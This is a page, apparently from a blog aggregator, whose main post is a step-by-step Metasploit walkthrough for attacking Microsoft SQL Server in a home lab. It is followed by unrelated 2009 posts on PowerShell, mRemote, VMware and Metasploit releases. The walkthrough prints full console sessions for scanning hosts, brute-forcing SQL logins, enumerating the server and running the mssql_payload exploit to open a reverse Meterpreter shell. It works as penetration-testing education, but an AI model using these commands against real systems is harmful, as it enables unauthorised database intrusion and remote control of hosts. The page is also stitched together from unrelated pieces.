blindpete.com Just my rambles

Now a days hacking has shifted from attacking systems to know how they work or for the trill of getting into a system for the sake of the hunt but many hackers are doing it for profit, in fact many companies around the world and states are employing hacker for information both for political and financial gain. One of the places where most of this information resides is in databases and one of the most popular databases in enterprises and governments now a days is Microsoft SQL Server and on this blog post I will cover some of the attacks you can do against this system with Metasploit 3.3.

The Microsoft SQL Server Product is in fact a suite of products compromise of several services like reporting, integration and others, in addition there is large number of types depending on the version like for instance in MSSQL 2000 there is a MSDE edition for Desktops that is small and lite, there is an Express, Web, Standard and Enterprise to mention the most popular with MSSQl 2005 and 2008 so in this blog post I will focus mainly on the Database component of it. MSSQL listens on 2 ports, port TCP 1433 and UDP port 1434, server instances get a random TCP port and this port can be obtain thru the UDP port 1434. It has 2 methods of authentication that can be configured SQL Authentication and Windows Authentication. This 2 methods differ in terms where the Account Credentials are stored and what policy is applied to such account. In MSSQL 2000 the SQL Authentication is one of the most abused methods of gaining access to the database since it does not log authentication attempts by default, it is clear text and one of the most abused methods is that by default there is no account lockout of password policy on this version on MSSQL, now on the most recent version SQL 2005 and SQL 2008 this differ in terms that the account policy being applied to the Windows host where the database engine is running, I have seen in production environments DBAs (Database Administrators) disable the policy checks for SQL accounts in the latest versions. Another one of the drawbacks of using SQL Authentication is the presence of the SA account, this account runs as sysadmin on the Database Engine and thru the store procedures on MSSQL it can execute command against the host OS under the privileges under whish the Database Engine is running under. As you can see using Windows Authentication is the way to go when performing hardening of a MS SQL system and making sure developers use Windows Accounts. One important note is that when the server is set for SQL Authentication it will also Authenticate Windows Users this is known as Mixed mode. In MSQL 2000 and 2005 the local Administrators group is given the sysadmin role by default and on MSSQL 2008 only the local Administrator account is given permission, on MSSQL Clusters the service account for the Database Engine has to be a domain account and in many installations I have seen this account be part of the Domain Administrators Group. This information can be of great use when doing post exploitation on a MSSQL host. Another important part of MSSQL systems is that they come with a large number of Stored Procedures that permit Command Execution on the host, modification of the hosts registry, File manipulation, sending emails and many other functions as “Features” making the post exploitation aspect of   MSSQL attack a very interesting one.

So lets start by finding all host running MSSQL Database Instances on a network for this Metasploit has an auxiliary module called mssql_ping, below you will see how to use this module and see the options it offers from a msfconsole window

 

msf > use auxiliary/scanner/mssql/mssql_pingmsf auxiliary(mssql_ping) > info

Name: MSSQL Ping Utility
Version: 6479
License: Metasploit Framework License (BSD)

Provided by:
MC <m...@metasploit.com>

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HEX2BINARY /home/carlos/framework3/trunk/data/exploits/mssql/h2b no The path to the hex2binary script on the disk
MSSQL_PASS no The password for the specified username
MSSQL_USER sa no The username to authenticate as
RHOSTS yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the MSSQL instance for information.

msf auxiliary(mssql_ping) > show advanced

Module advanced options:

Name : CHOST
Current Setting:
Description : The local client address

Name : CPORT
Current Setting:
Description : The local client port

Name : ConnectTimeout
Current Setting: 10
Description : Maximum number of seconds to establish a TCP connection

Name : Proxies
Current Setting:
Description : Use a proxy chain

Name : SSL
Current Setting: false
Description : Negotiate SSL for outgoing connections

Name : SSLVersion
Current Setting: SSL3
Description : Specify the version of SSL that should be used (accepted: SSL2,
SSL3, TLS1)

Name : ShowProgress
Current Setting: true
Description : Display progress messages during a scan

Name : ShowProgressPercent
Current Setting: 10
Description : The interval in percent that progress should be shown

The 2 options we need are the RHOSTS and the THREADS options. Lets set and run the module against the network in my lab.

msf auxiliary(mssql_ping) > set RHOSTS 192.168.1.1/24RHOSTS => 192.168.1.1/24msf auxiliary(mssql_ping) > set THREADS 10THREADS => 10msf auxiliary(mssql_ping) > run

[*] Scanned 026 of 256 hosts (010% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 077 of 256 hosts (030% complete)
[*] SQL Server information for 192.168.1.108:
[*] tcp = 1433
[*] Version = 9.00.1399.06
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = DBSQL2K501
[*] Scanned 103 of 256 hosts (040% complete)
[*] Scanned 128 of 256 hosts (050% complete)
[*] SQL Server information for 192.168.1.156:
[*] tcp = 1433
[*] Version = 10.0.1600.22
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = DBSQL2K801
[*] Scanned 155 of 256 hosts (060% complete)
[*] Scanned 180 of 256 hosts (070% complete)
[*] Scanned 205 of 256 hosts (080% complete)
[*] Scanned 232 of 256 hosts (090% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mssql_ping) >

As it can be seen 2 servers where found, know I like to corroborate always my findings with other tools so I can be sure I’m targeting the correct targets and the correct versions, for this we will use the nmap por sacnner with one of their nse scripts

carlos@loki:~$ sudo nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156

Starting Nmap 5.10BETA1 ( http://nmap.org ) at 2009-11-26 21:25 AST
NSE: Script Scanning completed.
Nmap scan report for 192.168.1.108
Host is up (0.00071s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
123/udp open|filtered ntp
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
1434/udp open ms-sql-m
| ms-sql-info: ServerName;DBSQL2K501;InstanceName;TESTLABINST;IsClustered;No;Version;9.00.1399.06;tcp;1033;;
| Server name: DBSQL2K501
| Server version: 9.00.1399.06 (RTM)
| Instance name: MSSQLSERVER
| TCP Port: 1433
| Could not retrieve actual version information
| Instance name: TESTLABINST
| TCP Port: 1033
|_ Could not retrieve actual version information
4500/udp open|filtered nat-t-ike
MAC Address: 00:0C:29:1B:83:F5 (VMware)

Nmap scan report for 192.168.1.156
Host is up (0.00073s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
123/udp open|filtered ntp
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
1434/udp open ms-sql-m
| ms-sql-info: Discovered Microsoft SQL Server
| Server name: DBSQL2K801
| Server version: 10.0.1600.22
| Instance name: MSSQLSERVER
| TCP Port: 1433
| Could not retrieve actual version information
| Instance name: TESTINST
| TCP Port: 1123
|_ Could not retrieve actual version information
4500/udp open|filtered nat-t-ike
MAC Address: 00:0C:29:38:20:33 (VMware)

Nmap done: 2 IP addresses (2 hosts up) scanned in 2.79 seconds
carlos@loki:~$

As it can be seen by the nmap scan there is a second instance on each of the host files, one special note is that when you run the nmap scan with the ms-sql-info nse script that the scan be a UDP scan and nmap must be ran as root. Another way is to use Nessus in command line mode with the plug-in id 10674

carlos@loki:/opt/nessus/bin$ sudo ./nessuscmd -i 10674 192.168.1.0/24 --max-hosts 25Starting nessuscmd 4.0.2Scanning '192.168.1.0/24'...

+ Host 192.168.1.1 is up
+ Host 192.168.1.2 is up
+ Results found on 192.168.1.108 :
- Port ms-sql-m (1434/udp)
[i] Plugin ID 10674
| A 'ping' request returned the following information about the remote
| SQL instances :
|
|
| ServerName : DBSQL2K501
| InstanceName : MSSQLSERVER
| IsClustered : No
| Version : 9.00.1399.06
| tcp : 1433
|
|
| ServerName : DBSQL2K501
| InstanceName : TESTLABINST
| IsClustered : No
| Version : 9.00.1399.06
| tcp : 1033
|
|

+ Results found on 192.168.1.156 :
- Port ms-sql-m (1434/udp)
[i] Plugin ID 10674
| A 'ping' request returned the following information about the remote
| SQL instances :
|
|
| ServerName : DBSQL2K801
| InstanceName : MSSQLSERVER
| IsClustered : No
| Version : 10.0.1600.22
| tcp : 1433
|
|
| ServerName : DBSQL2K801
| InstanceName : TESTINST
| IsClustered : No
| Version : 10.0.1600.22
| tcp : 1123
|
|

+ Host 192.168.1.157 is up
+ Host 192.168.1.179 is up
+ Host 192.168.1.194 is up
+ Host 192.168.1.232 is up
+ Host 192.168.1.239 is up
+ Host 192.168.1.245 is up
carlos@loki:/opt/nessus/bin$

As it can be seen each tools gives a different level of information, but I have found that one of the fastest ways is to use Microsoft own tools, the Microsoft SQL Server Management Studio that comes as part of MS SQL 2005 and MS SQL 2008 is on the fastest at finding MSSQL Machines on the same subnet and also helps in identifying any other MS SQL Services that might be available something that the other tools do not detect or look for.

we start by bringing up Microsoft SQL Server Management Studio and in the login box selecting to Browse for More servers than the ones local

On the Next screen we select the Network Servers tab and there we will see what it discovered.

Now for our next attack we will do a brute force attack but first we have to find out if the servers are configured for SQL Authentication and here management studio comes in to play again, we can select a sever give it bogus credentials and the error message we get back will tell us if it is.

When we get a message that says the user is not associated with a trusted SQL Server Connection it means that there is a miss match of protocol giving us the information that it does not support SQL Authentication. If SQL Authentication is enabled the message would be login failed message

Now that we know whish server to attack with the brute force we can choose the SA account but since this server is a MS SQL 2008 we know that since it is disabled by default we might have to try another one if SA fails, in our case we will assume we got the user meta from an IIS 500 error. in Metasploit we load the brute force login module for MS SQL

msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_loginmsf auxiliary(mssql_login) > info

Name: MSSQL Login Utility
Version: 7185
License: Metasploit Framework License (BSD)

Provided by:
MC <m...@metasploit.com>

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HEX2BINARY /home/carlos/framework3/trunk/data/exploits/mssql/h2b no The path to the hex2binary script on the disk
MSSQL_PASS no The password for the specified username
MSSQL_PASS_FILE no A dictionary of passwords to perform a bruteforce attempt
MSSQL_USER sa no The username to authenticate as
RHOSTS yes The target address range or CIDR identifier
RPORT 1433 yes The target port
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the MSSQL instance for a specific
user/pass (default is sa with blank).

We have to give it our target host in the RHOST variable, the username to test in MSSQL_USER and the dictionary file in MSSQL_PASS_FILE. The THREADS will depend on the network connection and load of the target for this example I will leave it as it is but I tend to start with 50 and the reduce in increments of 5 if I get any error

msf auxiliary(mssql_login) > set MSSQL_USER metaMSSQL_USER => metamsf auxiliary(mssql_login) > set MSSQL_PASS_FILE /tmp/dict.txtMSSQL_PASS_FILE => /tmp/dict.txtmsf auxiliary(mssql_login) > set RHOSTS 192.168.1.156RHOSTS => 192.168.1.156msf auxiliary(mssql_login) > run

[*] 192.168.1.156:1433 successful logged in as 'meta' with password 'meta'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mssql_login) >

Now that we have a username and password lets enumerate the MSSQL server with the enumeration module

msf auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_enummsf auxiliary(mssql_enum) > info

Name: Microsoft SQL Server Configuration Enumerator
Version: 7226
License: Metasploit Framework License (BSD)

Provided by:
Carlos Perez <carl...@darkoperator.com>

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HEX2BINARY /home/carlos/framework3/trunk/data/exploits/mssql/h2b no The path to the hex2binary script on the disk
MSSQL_PASS no The password for the specified username
MSSQL_USER sa no The username to authenticate as
RHOST yes The target address
RPORT 1433 yes The target port

Description:
This module will perform a series of configuration audits and
security checks against a Microsoft SQL Server database. For this
module to work, valid administrative user credentials must be
supplied.

msf auxiliary(mssql_enum) >

We will provide the username and password we found in addition to the target and run it

msf auxiliary(mssql_enum) > set MSSQL_USER metaMSSQL_USER => metamsf auxiliary(mssql_enum) > set MSSQL_PASS metaMSSQL_USER => metamsf auxiliary(mssql_enum) > set RHOST 192.168.1.156RHOST => 192.168.1.156msf auxiliary(mssql_enum) > run

[*] Running MS SQL Server Enumeration...
[*] Auxiliary module execution completed
msf auxiliary(mssql_enum) > set MSSQL_PASS meta
MSSQL_PASS => meta
msf auxiliary(mssql_enum) > run

[*] Running MS SQL Server Enumeration...
[*] Version:
[*] Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86)
[*] Jul 9 2008 14:43:34
[*] Copyright (c) 1988-2008 Microsoft Corporation
[*] Enterprise Edition on Windows NT 5.2 <X86> (Build 3790: Service Pack 2)
[*] Configuration Parameters:
[*] C2 Audit Mode is Not Enabled
[*] xp_cmdshell is Enabled
[*] remote access is Enabled
[*] allow updates is Not Enabled
[*] Database Mail XPs is Not Enabled
[*] Ole Automation Procedures are Not Enabled
[*] Databases on the server:
[*] Database name:master
[*] Databse Files for master:
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\master.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\mastlog.ldf
[*] Database name:tempdb
[*] Databse Files for tempdb:
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\tempdb.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\templog.ldf
[*] Database name:model
[*] Databse Files for model:
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\model.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\modellog.ldf
[*] Database name:msdb
[*] Databse Files for msdb:
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\MSDBData.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\MSDBLog.ldf
[*] System Logins on this Server:
[*] sa
[*] ##MS_SQLResourceSigningCertificate##
[*] ##MS_SQLReplicationSigningCertificate##
[*] ##MS_SQLAuthenticatorCertificate##
[*] ##MS_PolicySigningCertificate##
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] ##MS_AgentSigningCertificate##
[*] NT AUTHORITY\SYSTEM
[*] NT AUTHORITY\NETWORK SERVICE
[*] DBSQL2K801\Administrator
[*] dangerlogin
[*] meta
[*] Disabled Accounts:
[*] sa
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] No Accounts Policy is set for:
[*] dangerlogin
[*] meta
[*] Password Expiration is not checked for:
[*] sa
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] dangerlogin
[*] meta
[*] System Admin Logins on this Server:
[*] sa
[*] NT AUTHORITY\SYSTEM
[*] NT AUTHORITY\NETWORK SERVICE
[*] DBSQL2K801\Administrator
[*] meta
[*] Windows Logins on this Server:
[*] NT AUTHORITY\SYSTEM
[*] NT AUTHORITY\NETWORK SERVICE
[*] DBSQL2K801\Administrator
[*] Windows Groups that can logins on this Server:
[*] No Windows Groups where found with permission to login to system.
[*] Accounts with Username and Password being the same:
[*] meta
[*] Accounts with empty password:
[*] No Accounts with empty passwords where found.
[*] Stored Procedures with Public Execute Permission found:
[*] sp_replsetsyncstatus
[*] sp_replcounters
[*] sp_replsendtoqueue
[*] sp_resyncexecutesql
[*] sp_prepexecrpc
[*] sp_repltrans
[*] sp_xml_preparedocument
[*] xp_qv
[*] xp_getnetname
[*] sp_releaseschemalock
[*] sp_refreshview
[*] sp_replcmds
[*] sp_unprepare
[*] sp_resyncprepare
[*] sp_createorphan
[*] xp_dirtree
[*] sp_replwritetovarbin
[*] sp_replsetoriginator
[*] sp_xml_removedocument
[*] sp_repldone
[*] sp_reset_connection
[*] xp_fileexist
[*] xp_fixeddrives
[*] sp_getschemalock
[*] sp_prepexec
[*] xp_revokelogin
[*] sp_resyncuniquetable
[*] sp_replflush
[*] sp_resyncexecute
[*] xp_grantlogin
[*] sp_droporphans
[*] xp_regread
[*] sp_getbindtoken
[*] sp_replincrementlsn
[*] Instances found on this server:
[*] MSSQLSERVER
[*] TESTINST
[*] Default Server Instance SQL Server Service is running under the privilege of:
[*] NT AUTHORITY\NETWORK SERVICE
[*] Instance TESTINST SQL Server Service is running under the privilage of:
[*] LocalSystem
[*] Auxiliary module execution completed
msf auxiliary(mssql_enum) >

Now we know what stored procedures are enabled or not, accounts, if policy is applied and a wealth of other information to continue our attack. One critical piece of information is that the instance is running as LocalSystem so we can get a shell on the system since if it was Network Service we would not be able to to start our shell, since nothing beats having a nice Meterpreter shell lets move from SQL access to shell on the host with the MSSQL Payload Exploit module

msf exploit(mssql_payload) > info

Name: Microsoft SQL Server Payload Execution
Version: 7236
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)

Provided by:
David Kennedy "ReL1K" <kenn...@gmail.com>

Available targets:
Id Name
-- ----
0 Automatic

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HEX2BINARY /home/carlos/framework3/trunk/data/exploits/mssql/h2b no The path to the hex2binary script on the disk
MSSQL_PASS no The password for the specified username
MSSQL_USER sa no The username to authenticate as
RHOST yes The target address
RPORT 1433 yes The target port

Payload information:

Description:
This module will execute an arbitrary payload on a Microsoft SQL
Server, using the Windows debug.com method for writing an executable
to disk and the xp_cmdshell stored procedure. File size restrictions
are avoided by incorporating the debug bypass method presented at
Defcon 17 by SecureState. Note that this module will leave a
metasploit payload in the Windows System32 directory which must be
manually deleted once the attack is completed.

References:
http://www.osvdb.org/557
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0402
http://www.securityfocus.com/bid/1281
http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf

msf exploit(mssql_payload) >

We set our values including our payload and we let the exploit module run

msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(mssql_payload) > set LHOST 192.168.1.158LHOST => 192.168.1.158msf exploit(mssql_payload) > set RHOST 92.168.1.156RHOST => 92.168.1.156msf exploit(mssql_payload) > set MSSQL_USER metaMSSQL_USER => metamsf exploit(mssql_payload) > set MSSQL_PASS metaMSSQL_PASS => metamsf exploit(mssql_payload) > exploitmsf exploit(mssql_payload) > exploit

[*] Started reverse handler on port 4444
[*] Warning: This module will leave fGDpiveA.exe in the SQL Server %TEMP% directory
[*] Writing the debug.com loader to the disk...
[*] Converting the debug script to an executable...
[*] Uploading the payload, please be patient...
[*] Converting the encoded payload...
[*] Executing the payload...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.156:1708)

meterpreter > sysinfo
Computer: DBSQL2K801
OS : Windows .NET Server (Build 3790, Service Pack 2).
Arch : x86
Language: en_US
meterpreter >

I hope you find this post useful and of help, this is only the basics of what can be done to and thru a MS SQL server.

Late last week we released to the web the latest version (1.3) of our free Active Directory cmdlets (also known as QAD-cmdlets, widely used by tens of thousands admins and compatible with more or less any version of Active Directory or ADAM/ADLDS).

You can read more about the cmdlets in this PDF guide, or online reference.

This is a significant update with some 14 new cmdlets, 24 new parameters, 43 enhanced ones, and a few bugs fixed (not that we had any really )

Detailed What’s New information can be found on page 19 of the PDF guide and in my upcoming blog posts. Download the new AD cmdlets now and let us know what you think by posting to the AD PowerShell discussion forum!

Possibly related posts: (automatically generated)

• Intel Lynnfield Core i5 and i7 Processors
• Episode 63 – PowerShell MVP Brandon Shell
• Episode 67 – Bob Bobel from Quest Software

by Wesley D - November 23, 2009

It seems as if the ratio between Systems Administrators and the systems that they must manage is getting higher and higher. At the same time, budgets are getting smaller and smaller. You may have managed to get a copy of Windows 7 out of the budget, but not much else. One way to save both money and aid in the administration of multiple remote systems is with the free and open-source tool mRemote (released under the GPL license).

Petri Recommends: Install Windows 7 Drivers Automatically

After installing Windows 7, it's important to install the correct hardware drivers to get your video, sound, network, and other components working properly.

Automate the update process with Driver Genius Professional.

Get the Driver Genius Pro Download Here...

The mRemote project was actively developed up until late 2008 when it was merged with a commercial, closed-source multiple remote desktop tool called vRD. However, in spite of the project having been officially halted, mRemote is quite mature and has no crippling restriction on its available features like the free version of vRD does.

Supported Protocols:

mRemote supports creating connections with the following protocols:

• Remote Desktop Protocol
• VNC
• Citrix ICA
• SSH
• Telnet
• HTTP and HTTPS
• rlogin
• RAW

Connections using RDP require version 6.0 of the Microsoft Terminal Services Client. Citrix ICA connections require you to download the free ICA Client from Citrix.com. Telnet, SSH, rlogin and RAW connections require the use of PuTTY as an external helper application. All mRemote packages come with PuTTY already included in the files. HTTP and HTTPS connections can be made within mRemote using the Internet Explorer rendering engine. However, you can also use the Gecko (Firefox) rendering engine if you download the free XULrunner.

User Interface:

One of the best features of mRemote is it's user interface. Anyone who is familiar with Visual Studio or the SQL Server Management Studio will instantly be at home with mRemote.

mRemote uses pinable information panes for all of it's various information consoles. For instance, the Connections pane is where you manage all of your connection files and folders.  The Config pane displays all of the configuration information for the selected connection or folder as well as allowing you to edit the information. If you unpin a pane it retracts into the side of the mRemote console and shows itself as a tab. Hovering the mouse over a tab causes the pane to fly out, just like Visual Studio. The above image shows the retracted "Errors and Info" and "Screenshots" tabs on the bottom of the program's window.

Just like in visual studio, you can tear panes off of any side and attach it to any other side as well as placing it directly in the center of the window.

To save even more space and allow for more efficient workflows, the remote connection windows themselves can be placed in unpinned tabs for easy fly-out access!

Connections are displayed in panels and tabs. Multiple panels can be created and each panel can contain tabs. Panels and tabs can be seen in the previous pictures. Towards the top of the application screen, the visual element that looks like a tab and are titled "Home" and "Alpha" are actually what mRemote refers to as a panel. Underneath the panel and above the remote display are multiple icons with the title of a connection. Those are referred to as Tabs and are what the remote connection is displayed within. In this way, you can more easily keep track of multiple connections based on the remote connection's function, location or any other designation you choose. For example, I prefer to have a separate panel for each network and then tabs of each connection on that network underneath.

Creating your Connections

Connections can be created manually, copied form an already existing connection or imported from supported file types. mRemote supports importing connections from Active Directory, .RDP files, a port scan or its own mRemote XML file type. The port scan features allows you to scan an entire subnet for standard open ports that would indicate a VNC, RDP or other supported connection type is listening for incoming connections.

Managing your Connections

Your connection files can be managed via a simple folder system displayed in the Connections pane. However, those folders can have a complex system of inheritance that allows you to propagate common settings to all subordinate connection files. When you select a folder, the Configuration panel allows you to edit all available connection options for all available connection types. When a connection is placed within that folder, the connection file can be set to inherit all options for that connection type from its parent folder or just individual options.

The image on the left displays some of a folder's inheritable options and the image on the right displays a child connection's inheritable options.

The ability to inherit options makes creating new connections fast and easy. As an example, folders could be created based on account type ("Domain Admin", "Accounting Admin", "Lisbon Power User", etc.) or computer type ("SharePoint Farm Members", "Apache Front Ends", etc.) and all connection files placed within have the ability to inherit username, password, domain, and all other options without tedious manual entry.

Connection files can be exported or saved as vRD CSV, mRemote CSV or mRemote XML files  to provide a backup copy or to share with others. mRemote also provides a beta ability to store connection files in a SQL Server database. This allows multiple users to access and modify the same set of connections simultaneously within one database. It should be noted that the SQL Server feature was experimental and your results may vary.

mRemote is Portable!

What can make an already immensely useful utility even more useful? If it's portable! The mRemote application comes in several different downloadable formats: A Windows Setup file, a binary package, a source package and a portable package. The executable in the portable package is made to store and retrieve its settings from files within its own directory. However, in order to use the various connection types you will need to manually register one dll file each for RDP, VNC and ICA connections to work (simply using regsvr32 at a command prompt). Instructions on how to do that are included in the application.

Customizations

mRemote offers the ability to create small "macros" within itself that call external applications and pass command line arguments to them. mRemote also offers the use of internal variables that can help when building the argument string. The supported variables are: %name%, %hostname%, %port%, %username%, %password%, %domain%, and %description%. To explain that better, I'll use the example that is supplied in mRemote's own documentation.

The example we'll look at is creating the ability to perform a simple tracert command to any host that is listed in the Connections pane. First you simply navigate to the External Applications management interface and add an instance of an external application. From there you create the display name (the name that will be seen within mRemote), give the path to the executable (in our case simply putting 'cmd' will work) and then pass the appropriate commands to the application ("/K tracert %hostname%" in our case).

From there, the new external application macro will be available from the context menu that appears when you right click any connection. When you take into consideration Windows 7's native support for PowerShell 2.0, the external application feature becomes even more powerful.

Miscellaneous Features

mRemote's features don't stop yet! There are various other capabilities such as a simple screenshot manager that can be used to take pictures of remote connections and save those files in the Screenshot Manager pane. This can come in handy when documenting your work. SSH file transfer is supported through SCP/SFTP. UltraVNC's single click is available. There is even a rudimentary port scanner included.

If your company is like mine, you are feeling the squeeze of a tightening budget as well as an increasing pool of systems to maintain. That was one of the reasons I started looking for an application like mRemote. It has helped me to streamline by daily workflow and, best of all, it works on Windows 7. I hope that it will help you out too! You can download the free, open source, mRemote here.

Just downloaded a copy and look very good

Reminder, there will be no PowerScripting Live this week due to the US Thanksgiving holiday. Next live show is Dec 1st. This means the next episode won’t be released on the website/iTunes until Dec 7th.

That said, we don’t want to leave you hungry! With that in mind, here’s a couple of resources for the new scripters out there. Even if you aren’t a newbie, you should check out both of these resources as there are plenty of tips within which you may not have come across before.

• Keith Hill’s Effective PowerShell e-book
• Tobias Weltner’s PowerShell.com e-book

And here is a massive list of videos available about Powershell from three of Microsoft’s media portal sites:

• PowerShell videos from TechEd Online
• PowerShell videos from Channel 9
• PowerShell videos from Technet Edge

Possibly related posts: (automatically generated)

• Episode 42 – with Greg Shields
• PowerShell video posted
• Episode 47 – MVP Systems JAMS
• videos for Kindle and Sony’s e-book

For some reason, people are having trouble finding links to the release version of Windows PowerShell 2.0 … I suspect it’s because while it was in CTP, a lot of us bloggers wrote about it and linked to the various CTP downloads … but there aren’t nearly as many posts announcing the release of Windows PowerShell 2.0 as you would expect.

Of course, most of the fault is Microsoft’s, because they buried PowerShell 2 in a knowledge base article with a title that exceeds nondescript, even for Microsoft: Description of the Windows Management Framework on Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008. What? Even the Microsoft PowerShell Team Blog never actually wrote a post announcing the PowerShell 2.0 release is available for download but instead wrote about the Windows Management Framework being released.

But in any case, I’m calling on the blogging community to fix the search engines by linking Windows PowerShell and particularly “Windows PowerShell 2.0”: http://support.microsoft.com/kb/968929 to either the Knowledge base article 968929 which has the download links for PowerShell 2.0 for Windows XP, Vista, and Server 2003 and 2008 … or to Microsoft.com/PowerShell which has the latest download links in the side-column on the right hand side.

I can’t fix the search engines on my own, but what was that slogan? Together we can!

VMware just released ESX 4.0 Update 1 and vCenter 4.0 Update 1. Most people have already reported on this by now. Two things that stood out for me personally is the following:

1. HA Cluster Configuration Maximum — HA clusters can now support 160 virtual machines per host in HA Cluster of 8 hosts or less. The maximum number of virtual machines per host in cluster sizes of 9 hosts and above is still 40, allowing a maximum of 1280 Virtual Machines per HA cluster.
2. Enhanced Clustering Support for Microsoft Windows – Microsoft Cluster Server (MSCS) for Windows 2000 and 2003 and Windows Server 2008 Failover Clustering is now supported on an VMware High Availability (HA) and Dynamic Resource Scheduler (DRS) cluster in a limited configuration. HA and DRS functionality can be effectively disabled for individual MSCS virtual machines as opposed to disabling HA and DRS on the entire ESX/ESXi host. Refer to the Setup for Failover Clustering and Microsoft Cluster Service guide for additional configuration guidelines.

Especially the first is important as many people have been building non DRS-HA clusters solely for MSCS VMs. As of now this is not needed anymore. You can simply disable DRS and HA via the Cluster properties to make sure your MSCS VMs do not move around. I think Update 1 is an important release for everyone running vSphere at this moment.

Of course you View guys were all waiting for Update 1 to drop:

• VMware View 4.0 support – This release adds support for VMware View 4.0, a solution built specifically for delivering desktops as a managed service from the protocol to the platform.

Full ESX 4.0 U1 Release Notes
Full vCenter 4.0 U1 Release Notes

Something else I noticed… The release notes for ESX talk about “vMotion” where the release notes for vCenter talk about “VMotion”. It seems that VMotion is about to be renamed to vMotion.

Will have to get this up and running an a test server

Tonight we released PowerCLI 4.0 U1. This release contains more than 60 new cmdlets as well as greatly improved performance, a new feature to make it easy to manage multiple ESX or vCenter servers from a single window and much, much more. We’ve also put our cmdlet reference online. Watch this space over the next few days for demo videos but in the meantime don’t forget to download and give it a try.

Get it here!

There are a couple of very cool things in this release. First, there are now standalone installs for Windows and Linux. This is a nice feature in light of some of the recent conflicts between Ruby versions and the framework.

Another feature that I like is the ability to embed Payloads into other .exe files. The OSVDB references are also very nice when it comes to report creating time. NX support in payloads will be a big help.

There is quite a lot to review/take in. Check out the full release notes here.

Be expecting a full review/discussion on our next show!!

All I can say is bring on 3.4 dev!

-strandjs

Our Powershell Help tool has been a favorite download for quite some time now. The built-in help command in the Powershell console is helpful if you need just some quick lookup, but for browsing and reading the console just isn’t good enough.

The CHM file Microsoft released is a pretty nice graphical way of getting help for the built-in cmdlets but it’s a closed file and information for third party or even other Microsoft snapins is not available and cannot be added.

Cmdlets organized by popular verbs

This new version of our popular Powershell help tool allows importing any xml help file and about files from other vendors and puts all this combined information on your desktop or notebook. Powershell doesn’t even need to be installed in order to use this.

We have a more detailed QuickGuide available here:
PowerShell Help Quick Guide

You can download this version from here in 32 and 64 bit versions: SAPIEN Community Tools

And yes, it is a Community Tool, so it is free with registration.

Here are some more screenshots:

Showing About files

Hyperlinked “Related Links”

Online Links shown in integrated browser

Search cmdlet help and About articles

Show search results and easily navigate between hits.

Import other help xml files or about articles.

Take notes and keep them associated with each individual help topic.

Technorati Tags: community edition, Help, powershell

Tags: community edition, Help, powershell

This entry was posted on Monday, November 16th, 2009 at 1:08 am and is filed under Community Tools, PrimalTools, Software News, Windows PowerShell, Windows Scripting News. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.